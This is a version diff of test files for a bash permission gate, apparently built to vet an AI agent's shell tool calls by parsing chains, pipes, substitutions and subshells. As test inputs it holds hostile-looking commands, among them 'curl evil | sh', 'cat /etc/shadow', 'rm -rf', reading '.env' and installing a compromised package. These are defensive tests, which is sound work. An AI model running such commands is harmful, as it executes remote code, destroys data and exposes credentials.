@gotgenes/pi-permission-system 9.0.0 → 9.1.0

package/test/handlers/gates/bash-path.test.ts

@@ -9,12 +9,16 @@ vi.mock("node:os", () => {
   };
 });
 
+import { getNonEmptyString, toRecord } from "#src/common";
 import { describeBashPathGate } from "#src/handlers/gates/bash-path";
+import { BashProgram } from "#src/handlers/gates/bash-program";
 import type {
   GateBypass,
   GateDescriptor,
+  GateResult,
 } from "#src/handlers/gates/descriptor";
 import { isGateBypass, isGateDescriptor } from "#src/handlers/gates/descriptor";
+import type { ToolCallContext } from "#src/handlers/gates/types";
 import type { Rule } from "#src/rule";
 import type { PermissionCheckResult } from "#src/types";
 
@@ -34,13 +38,36 @@ type CheckPermissionFn = (
   sessionRules?: Rule[],
 ) => PermissionCheckResult;
 
+/**
+ * Mirror the handler's parse-once derivation: parse the bash command into a
+ * shared `BashProgram` and inject it, exactly as `permission-gate-handler.ts`
+ * does, so the gate is exercised through the production wiring.
+ */
+async function describeGate(
+  tcc: ToolCallContext,
+  checkPermission: CheckPermissionFn,
+  getSessionRuleset: () => Rule[],
+): Promise<GateResult> {
+  const command = getNonEmptyString(toRecord(tcc.input).command);
+  const bashProgram =
+    tcc.toolName === "bash" && command
+      ? await BashProgram.parse(command)
+      : null;
+  return describeBashPathGate(
+    tcc,
+    bashProgram,
+    checkPermission,
+    getSessionRuleset,
+  );
+}
+
 // ── tests ──────────────────────────────────────────────────────────────────
 
 describe("describeBashPathGate", () => {
   it("returns null for non-bash tools", async () => {
     const checkPermission = vi.fn<CheckPermissionFn>();
     const getSessionRuleset = vi.fn<() => Rule[]>().mockReturnValue([]);
-    const result = await describeBashPathGate(
+    const result = await describeGate(
       makeTcc({ toolName: "read", input: { path: ".env" } }),
       checkPermission,
       getSessionRuleset,
@@ -51,7 +78,7 @@ describe("describeBashPathGate", () => {
   it("returns null when no tokens are extracted", async () => {
     const checkPermission = vi.fn<CheckPermissionFn>();
     const getSessionRuleset = vi.fn<() => Rule[]>().mockReturnValue([]);
-    const result = await describeBashPathGate(
+    const result = await describeGate(
       makeTcc({ input: { command: "echo hello" } }),
       checkPermission,
       getSessionRuleset,
@@ -64,7 +91,7 @@ describe("describeBashPathGate", () => {
       .fn<CheckPermissionFn>()
       .mockReturnValue(makeCheckResult({ state: "allow" }));
     const getSessionRuleset = vi.fn<() => Rule[]>().mockReturnValue([]);
-    const result = await describeBashPathGate(
+    const result = await describeGate(
       makeTcc({ input: { command: "cat .env" } }),
       checkPermission,
       getSessionRuleset,
@@ -80,7 +107,7 @@ describe("describeBashPathGate", () => {
       }),
     );
     const getSessionRuleset = vi.fn<() => Rule[]>().mockReturnValue([]);
-    const result = await describeBashPathGate(
+    const result = await describeGate(
       makeTcc({ input: { command: "cat .env" } }),
       checkPermission,
       getSessionRuleset,
@@ -97,7 +124,7 @@ describe("describeBashPathGate", () => {
       .fn<CheckPermissionFn>()
       .mockReturnValue(makeCheckResult({ state: "ask", matchedPattern: "*" }));
     const getSessionRuleset = vi.fn<() => Rule[]>().mockReturnValue([]);
-    const result = await describeBashPathGate(
+    const result = await describeGate(
       makeTcc({ input: { command: "cat .env" } }),
       checkPermission,
       getSessionRuleset,
@@ -115,7 +142,7 @@ describe("describeBashPathGate", () => {
         makeCheckResult({ state: "deny", matchedPattern: "*.env" }),
       );
     const getSessionRuleset = vi.fn<() => Rule[]>().mockReturnValue([]);
-    const result = (await describeBashPathGate(
+    const result = (await describeGate(
       makeTcc({ input: { command: "cat .env" } }),
       checkPermission,
       getSessionRuleset,
@@ -135,7 +162,7 @@ describe("describeBashPathGate", () => {
         makeCheckResult({ state: "deny", matchedPattern: "*.env" }),
       );
     const getSessionRuleset = vi.fn<() => Rule[]>().mockReturnValue([]);
-    const result = (await describeBashPathGate(
+    const result = (await describeGate(
       makeTcc({ input: { command: "cat .env" } }),
       checkPermission,
       getSessionRuleset,
@@ -156,7 +183,7 @@ describe("describeBashPathGate", () => {
         origin: "session",
       },
     ]);
-    const result = await describeBashPathGate(
+    const result = await describeGate(
       makeTcc({ input: { command: "cat .env" } }),
       checkPermission,
       getSessionRuleset,
@@ -169,7 +196,7 @@ describe("describeBashPathGate", () => {
   it("returns null when command is missing", async () => {
     const checkPermission = vi.fn<CheckPermissionFn>();
     const getSessionRuleset = vi.fn<() => Rule[]>().mockReturnValue([]);
-    const result = await describeBashPathGate(
+    const result = await describeGate(
       makeTcc({ input: {} }),
       checkPermission,
       getSessionRuleset,
@@ -188,7 +215,7 @@ describe("describeBashPathGate", () => {
         return makeCheckResult({ state: "deny", matchedPattern: "*.env" });
       });
     const getSessionRuleset = vi.fn<() => Rule[]>().mockReturnValue([]);
-    const result = await describeBashPathGate(
+    const result = await describeGate(
       makeTcc({ input: { command: "cat src/foo.ts .env" } }),
       checkPermission,
       getSessionRuleset,
@@ -209,7 +236,7 @@ describe("describeBashPathGate", () => {
         return makeCheckResult({ state: "allow" });
       });
     const getSessionRuleset = vi.fn<() => Rule[]>().mockReturnValue([]);
-    const result = await describeBashPathGate(
+    const result = await describeGate(
       makeTcc({ input: { command: "cp .env README.md" } }),
       checkPermission,
       getSessionRuleset,
@@ -232,7 +259,7 @@ describe("describeBashPathGate", () => {
         return makeCheckResult({ state: "allow" });
       });
     const getSessionRuleset = vi.fn<() => Rule[]>().mockReturnValue([]);
-    const result = await describeBashPathGate(
+    const result = await describeGate(
       makeTcc({ input: { command: "echo test > .env" } }),
       checkPermission,
       getSessionRuleset,
@@ -252,7 +279,7 @@ describe("describeBashPathGate", () => {
       }),
     );
     const getSessionRuleset = vi.fn<() => Rule[]>().mockReturnValue([]);
-    const result = await describeBashPathGate(
+    const result = await describeGate(
       makeTcc({ input: { command: "cat .env" } }),
       checkPermission,
       getSessionRuleset,
@@ -280,7 +307,7 @@ describe("describeBashPathGate", () => {
         });
       });
     const getSessionRuleset = vi.fn<() => Rule[]>().mockReturnValue([]);
-    const result = await describeBashPathGate(
+    const result = await describeGate(
       makeTcc({ input: { command: "cat src/foo.ts .env" } }),
       checkPermission,
       getSessionRuleset,

package/test/handlers/gates/bash-program.test.ts

@@ -0,0 +1,179 @@
+import { describe, expect, it } from "vitest";
+
+import { BashProgram } from "#src/handlers/gates/bash-program";
+
+describe("BashProgram", () => {
+  describe("pathTokens", () => {
+    it("returns dot-files and relative path tokens", async () => {
+      const program = await BashProgram.parse("cat .env src/foo.ts");
+      expect(program.pathTokens()).toEqual([".env", "src/foo.ts"]);
+    });
+
+    it("returns an empty array when there are no path tokens", async () => {
+      const program = await BashProgram.parse("echo hello");
+      expect(program.pathTokens()).toEqual([]);
+    });
+
+    it("deduplicates repeated tokens across a command chain", async () => {
+      const program = await BashProgram.parse("cat .env && rm .env");
+      expect(program.pathTokens()).toEqual([".env"]);
+    });
+  });
+
+  describe("externalPaths", () => {
+    const cwd = "/projects/my-app";
+
+    it("returns absolute paths resolving outside cwd", async () => {
+      const program = await BashProgram.parse("cat /etc/hosts");
+      // Subset matcher: the path is normalized before comparison.
+      expect(program.externalPaths(cwd)).toContain("/etc/hosts");
+    });
+
+    it("excludes paths within cwd", async () => {
+      const program = await BashProgram.parse("cat src/index.ts");
+      expect(program.externalPaths(cwd)).toHaveLength(0);
+    });
+  });
+
+  describe("commands", () => {
+    it("returns a single-element list for a lone command", async () => {
+      const program = await BashProgram.parse("npm install pkg");
+      expect(program.commands()).toEqual([{ text: "npm install pkg" }]);
+    });
+
+    it("splits an && chain", async () => {
+      const program = await BashProgram.parse("cd /p && npm i x");
+      expect(program.commands()).toEqual([
+        { text: "cd /p" },
+        { text: "npm i x" },
+      ]);
+    });
+
+    it("splits || , ; and & separators", async () => {
+      expect((await BashProgram.parse("a || b")).commands()).toEqual([
+        { text: "a" },
+        { text: "b" },
+      ]);
+      expect((await BashProgram.parse("a ; b")).commands()).toEqual([
+        { text: "a" },
+        { text: "b" },
+      ]);
+      expect((await BashProgram.parse("a & b")).commands()).toEqual([
+        { text: "a" },
+        { text: "b" },
+      ]);
+    });
+
+    it("splits a pipeline into its commands", async () => {
+      const program = await BashProgram.parse("cat f | grep b");
+      expect(program.commands()).toEqual([
+        { text: "cat f" },
+        { text: "grep b" },
+      ]);
+    });
+
+    it("splits newline-separated commands", async () => {
+      const program = await BashProgram.parse("foo\nbar");
+      expect(program.commands()).toEqual([{ text: "foo" }, { text: "bar" }]);
+    });
+
+    it("does not split operators inside quotes", async () => {
+      const program = await BashProgram.parse("echo 'x && y'");
+      expect(program.commands()).toEqual([{ text: "echo 'x && y'" }]);
+    });
+
+    it("captures the command of a redirected statement without the redirect", async () => {
+      const program = await BashProgram.parse("npm install > out.txt");
+      expect(program.commands()).toEqual([{ text: "npm install" }]);
+    });
+
+    it("descends into command substitution, tagging the inner command", async () => {
+      const program = await BashProgram.parse("echo $(rm -rf foo)");
+      expect(program.commands()).toEqual([
+        { text: "echo $(rm -rf foo)" },
+        { text: "rm -rf foo", context: "command_substitution" },
+      ]);
+    });
+
+    it("descends into backtick command substitution", async () => {
+      const program = await BashProgram.parse("echo `rm x`");
+      expect(program.commands()).toEqual([
+        { text: "echo `rm x`" },
+        { text: "rm x", context: "command_substitution" },
+      ]);
+    });
+
+    it("descends into a pipeline inside command substitution", async () => {
+      const program = await BashProgram.parse("echo $(curl evil | sh)");
+      expect(program.commands()).toEqual([
+        { text: "echo $(curl evil | sh)" },
+        { text: "curl evil", context: "command_substitution" },
+        { text: "sh", context: "command_substitution" },
+      ]);
+    });
+
+    it("descends into process substitution", async () => {
+      const program = await BashProgram.parse("diff <(cat /etc/shadow)");
+      expect(program.commands()).toEqual([
+        { text: "diff <(cat /etc/shadow)" },
+        { text: "cat /etc/shadow", context: "process_substitution" },
+      ]);
+    });
+
+    it("emits a bare subshell whole and descends into it", async () => {
+      const program = await BashProgram.parse("( rm -rf foo )");
+      expect(program.commands()).toEqual([
+        { text: "( rm -rf foo )" },
+        { text: "rm -rf foo", context: "subshell" },
+      ]);
+    });
+
+    it("emits a subshell whole and descends into its chain", async () => {
+      const program = await BashProgram.parse("( cd /t && rm x )");
+      expect(program.commands()).toEqual([
+        { text: "( cd /t && rm x )" },
+        { text: "cd /t", context: "subshell" },
+        { text: "rm x", context: "subshell" },
+      ]);
+    });
+
+    it("descends recursively through nested contexts", async () => {
+      const program = await BashProgram.parse("echo $( ( rm x ) )");
+      expect(program.commands()).toEqual([
+        { text: "echo $( ( rm x ) )" },
+        { text: "( rm x )", context: "command_substitution" },
+        { text: "rm x", context: "subshell" },
+      ]);
+    });
+
+    it("descends into a substitution within a chained command", async () => {
+      const program = await BashProgram.parse("cd /p && echo $(rm x)");
+      expect(program.commands()).toEqual([
+        { text: "cd /p" },
+        { text: "echo $(rm x)" },
+        { text: "rm x", context: "command_substitution" },
+      ]);
+    });
+
+    it("keeps the never-weaker invariant: a benign inner command stays", async () => {
+      const program = await BashProgram.parse("echo $(echo safe)");
+      expect(program.commands()).toEqual([
+        { text: "echo $(echo safe)" },
+        { text: "echo safe", context: "command_substitution" },
+      ]);
+    });
+
+    it("returns an empty list for an empty or whitespace command", async () => {
+      expect((await BashProgram.parse("")).commands()).toEqual([]);
+      expect((await BashProgram.parse("   ")).commands()).toEqual([]);
+    });
+  });
+
+  it("derives both slices from a single parse", async () => {
+    const program = await BashProgram.parse("cat .env /etc/hosts");
+    expect(program.pathTokens()).toEqual([".env", "/etc/hosts"]);
+    const external = program.externalPaths("/projects/my-app");
+    expect(external).toContain("/etc/hosts");
+    expect(external).not.toContain(".env");
+  });
+});

package/test/handlers/gates/candidate-check.test.ts

@@ -0,0 +1,52 @@
+import { describe, expect, it } from "vitest";
+
+import { pickMostRestrictive } from "#src/handlers/gates/candidate-check";
+
+import { makeGateCheckResult } from "#test/helpers/gate-fixtures";
+
+describe("pickMostRestrictive", () => {
+  it("returns undefined for an empty list", () => {
+    expect(pickMostRestrictive([])).toBeUndefined();
+  });
+
+  it("returns the single result for a one-element list", () => {
+    const only = makeGateCheckResult({ state: "allow" });
+    expect(pickMostRestrictive([only])).toBe(only);
+  });
+
+  it("prefers deny over ask and allow regardless of position", () => {
+    const allow = makeGateCheckResult({ state: "allow", matchedPattern: "a" });
+    const ask = makeGateCheckResult({ state: "ask", matchedPattern: "b" });
+    const deny = makeGateCheckResult({ state: "deny", matchedPattern: "c" });
+    expect(pickMostRestrictive([allow, ask, deny])).toBe(deny);
+    expect(pickMostRestrictive([deny, ask, allow])).toBe(deny);
+  });
+
+  it("prefers ask over allow when no deny is present", () => {
+    const allow = makeGateCheckResult({ state: "allow" });
+    const ask = makeGateCheckResult({ state: "ask" });
+    expect(pickMostRestrictive([allow, ask])).toBe(ask);
+  });
+
+  it("keeps the first deny on ties", () => {
+    const deny1 = makeGateCheckResult({
+      state: "deny",
+      matchedPattern: "first",
+    });
+    const deny2 = makeGateCheckResult({
+      state: "deny",
+      matchedPattern: "second",
+    });
+    expect(pickMostRestrictive([deny1, deny2])).toBe(deny1);
+  });
+
+  it("keeps the first ask on ties when no deny is present", () => {
+    const allow = makeGateCheckResult({ state: "allow" });
+    const ask1 = makeGateCheckResult({ state: "ask", matchedPattern: "first" });
+    const ask2 = makeGateCheckResult({
+      state: "ask",
+      matchedPattern: "second",
+    });
+    expect(pickMostRestrictive([allow, ask1, ask2])).toBe(ask1);
+  });
+});

package/test/handlers/tool-call.test.ts

@@ -287,3 +287,114 @@ describe("handleToolCall — bash path gate", () => {
     expect(result).toMatchObject({ block: true });
   });
 });
+
+// ── bash command chain gate ───────────────────────────────────────────────
+
+describe("handleToolCall — bash command chain gate", () => {
+  it("blocks a chain when a later sub-command is denied (#301)", async () => {
+    const checkPermission = vi
+      .fn()
+      .mockImplementation((surface: string, input: unknown) => {
+        if (surface === "bash") {
+          const command = (input as { command?: string }).command ?? "";
+          return /^npm\b/.test(command)
+            ? makeCheckResult({
+                state: "deny",
+                source: "bash",
+                command,
+                matchedPattern: "npm *",
+              })
+            : makeCheckResult({
+                state: "allow",
+                source: "bash",
+                command,
+                matchedPattern: "echo *",
+              });
+        }
+        return makeCheckResult({ state: "allow" });
+      });
+    const { handler } = makeHandler({
+      session: { checkPermission },
+      toolRegistry: {
+        getAll: vi.fn().mockReturnValue([{ name: "bash" }]),
+      },
+    });
+    const event = {
+      type: "tool_call",
+      toolCallId: "tc-bash-chain",
+      name: "bash",
+      input: { command: "echo start && npm install compromised-package" },
+    };
+    const result = await handler.handleToolCall(event, makeCtx());
+    expect(result).toMatchObject({ block: true });
+  });
+
+  it("blocks a command nested inside command substitution (#306)", async () => {
+    const checkPermission = vi
+      .fn()
+      .mockImplementation((surface: string, input: unknown) => {
+        if (surface === "bash") {
+          const command = (input as { command?: string }).command ?? "";
+          return /^rm\b/.test(command)
+            ? makeCheckResult({
+                state: "deny",
+                source: "bash",
+                command,
+                matchedPattern: "rm *",
+              })
+            : makeCheckResult({
+                state: "allow",
+                source: "bash",
+                command,
+                matchedPattern: "echo *",
+              });
+        }
+        return makeCheckResult({ state: "allow" });
+      });
+    const { handler } = makeHandler({
+      session: { checkPermission },
+      toolRegistry: {
+        getAll: vi.fn().mockReturnValue([{ name: "bash" }]),
+      },
+    });
+    const event = {
+      type: "tool_call",
+      toolCallId: "tc-bash-substitution",
+      name: "bash",
+      input: { command: "echo $(rm -rf foo)" },
+    };
+    const result = await handler.handleToolCall(event, makeCtx());
+    expect(result).toMatchObject({ block: true });
+  });
+
+  it("allows a single non-chained bash command", async () => {
+    const checkPermission = vi
+      .fn()
+      .mockImplementation((surface: string, input: unknown) => {
+        if (surface === "bash") {
+          const command = (input as { command?: string }).command ?? "";
+          return makeCheckResult({
+            state: "allow",
+            source: "bash",
+            command,
+            matchedPattern: "echo *",
+          });
+        }
+        return makeCheckResult({ state: "allow" });
+      });
+    const { handler } = makeHandler({
+      session: { checkPermission },
+      toolRegistry: {
+        getAll: vi.fn().mockReturnValue([{ name: "bash" }]),
+      },
+    });
+    const event = {
+      type: "tool_call",
+      toolCallId: "tc-bash-single",
+      name: "bash",
+      input: { command: "echo hi" },
+    };
+    const result = await handler.handleToolCall(event, makeCtx());
+    expect(result).toEqual({});
+  });
+});

package/test/permission-prompts.test.ts

@@ -151,6 +151,22 @@ describe("formatAskPrompt", () => {
     expect(result).toContain("matched 'git *'");
   });
 
+  test("formats bash prompt with nested execution context", () => {
+    const result = formatAskPrompt(
+      toolResult("bash", {
+        command: "rm -rf foo",
+        matchedPattern: "rm *",
+        commandContext: "command_substitution",
+      }),
+      undefined,
+      undefined,
+      makeFormatter(),
+    );
+    expect(result).toContain(
+      "bash command 'rm -rf foo' (matched 'rm *', inside command substitution).",
+    );
+  });
+
   test("formats MCP prompt with target", () => {
     const result = formatAskPrompt(
       mcpResult("server:query"),